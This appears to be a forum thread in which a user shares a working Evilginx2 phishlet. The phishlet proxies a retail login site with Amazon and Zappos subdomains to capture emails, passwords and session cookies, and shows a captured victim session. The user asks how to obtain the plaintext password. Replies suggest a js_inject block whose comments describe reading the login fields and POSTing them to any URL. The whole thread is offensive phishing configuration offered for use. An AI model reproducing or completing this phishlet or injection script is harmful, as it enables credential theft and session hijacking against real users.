I need to intercept the encrypted password using a JavaScript script and store it in the Evilginx2 session. Please show how to do that.

Evilginx
,
1

I created a phishlet.
I can intercept the login, password, and cookies.
However, the password is captured in an encrypted format as encryptedPwd .

I want the password to be captured in decrypted form, but I haven’t been able to do it.
I need it to be stored in plaintext format in the password field.
I spent a long time trying to find a solution, but without success.

Can you explain how I can decrypt the password on the fly and inject it into the Evilginx2 sessions?
How can this be implemented? Please write at least a sample script so I can start working from there, and explain how

id phishlet username password tokens remote ip time
1 xxx barakuda… AYAAFF3A++y… captured 234.234.234.12 2025-05-28 09:31

min_ver: ‘3.0.0’

proxy_hosts:

  • {phish_sub: ‘www’, orig_sub: ‘www’, domain: ‘xxx.com’, session: true, is_landing: true, auto_filter: true}

  • {phish_sub: ‘auth’, orig_sub: ‘auth’, domain: ‘xxx.com’, session: true, is_landing: false, auto_filter: true}

  • {phish_sub: ‘amethyst’, orig_sub: ‘amethyst’, domain: ‘xxx.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘amazon’, orig_sub: ‘amazon’, domain: ‘xxx.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘aax’, orig_sub: ‘aax’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘c’, orig_sub: ‘c’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘config.aps’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘api-cdn’, orig_sub: ‘api-cdn’, domain: ‘amazon.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘fls-na’, orig_sub: ‘fls-na’, domain: ‘amazon.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘m’, orig_sub: ‘m’, domain: ‘media-amazon.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘images-na’, orig_sub: ‘images-na’, domain: ‘ssl-images-amazon.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘edge’, orig_sub: ‘edge’, domain: ‘flags.zappos.app’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘tagging’, orig_sub: ‘tagging’, domain: ‘mkt.zappos.com’, session: false, is_landing: false, auto_filter: true}

  • {phish_sub: ‘zappos’, orig_sub: ‘www’, domain: ‘zappos.com’, session: false, is_landing: false, auto_filter: true}

sub_filters:

  • {triggers_on: ‘www.xxx.com’, orig_sub: ‘www’, domain: ‘xxx.com’, search: ‘(https?:\/\/www\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘auth.xxx.com’, orig_sub: ‘auth’, domain: ‘xxx.com’, search: ‘(https?:\/\/auth\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘amethyst.xxx.com’, orig_sub: ‘amethyst’, domain: ‘xxx.com’, search: ‘(https?:\/\/amethyst\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘amazon.xxx.com’, orig_sub: ‘amazon’, domain: ‘xxx.com’, search: ‘(https?:\/\/amazon\.xxx\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘aax.amazon-adsystem.com’, orig_sub: ‘aax’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/aax\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘c.amazon-adsystem.com’, orig_sub: ‘c’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/c\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘config.aps.amazon-adsystem.com’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/config\.aps\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘api-cdn.amazon.com’, orig_sub: ‘api-cdn’, domain: ‘amazon.com’, search: ‘(https?:\/\/api-cdn\.amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘fls-na.amazon.com’, orig_sub: ‘fls-na’, domain: ‘amazon.com’, search: ‘(https?:\/\/fls-na\.amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘m.media-amazon.com’, orig_sub: ‘m’, domain: ‘media-amazon.com’, search: ‘(https?:\/\/m\.media-amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘images-na.ssl-images-amazon.com’, orig_sub: ‘images-na’, domain: ‘ssl-images-amazon.com’, search: ‘(https?:\/\/images-na\.ssl-images-amazon\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘edge.flags.zappos.app’, orig_sub: ‘edge.flags’, domain: ‘zappos.app’, search: ‘(https?:\/\/edge\.flags\.zappos\.app)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘tagging.mkt.zappos.com’, orig_sub: ‘tagging.mkt’, domain: ‘zappos.com’, search: ‘(https?:\/\/tagging\.mkt\.zappos\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

  • {triggers_on: ‘config.aps.amazon-adsystem.com’, orig_sub: ‘config.aps’, domain: ‘amazon-adsystem.com’, search: ‘(https?:\/\/config\.aps\.amazon-adsystem\.com)’, replace: ‘https://{hostname}’, mimes: [‘text/html’, ‘application/json’, ‘application/javascript’]}

auth_urls:

  • ‘/login’

auth_tokens:

  • domain: ‘.xxx.com’
    keys: [‘geo’, ‘clouddc’, ‘zfc’, ‘ak_bmsc’, ‘_ga’, ‘_scid’, ‘tid’, ‘ubid-main’, ‘session-id’, ‘session-id-time’, ‘x-main’, ‘at-main’, ‘sess-at-main’, ‘holmes’, ‘session-token’, ‘bm_sv’, ‘_scid_r’, ‘_ga_Z3NX31HJZE’]
  • domain: ‘.www.xxx.com’
    keys: [‘cwr_u’, ‘cwr_s’]

credentials:
username:
key: ‘email’
search: ‘(.)’
type: ‘post’
password:
key: ‘encryptedPwd’
search: '(.)’
type: ‘post’

login:
domain: ‘www.xxx.com
path: ‘/’

2

you need to use inject js

3 
js_inject:
  - trigger_domains: ["www.xxxx.com"]
    trigger_paths: ["/uas/login"]
    trigger_params: ["email"]
    script: |
      // here add javascipt to load username and password element and get values and send on nextwork 
// like making post request to random ul , url dosent matter we just need to send on network thats it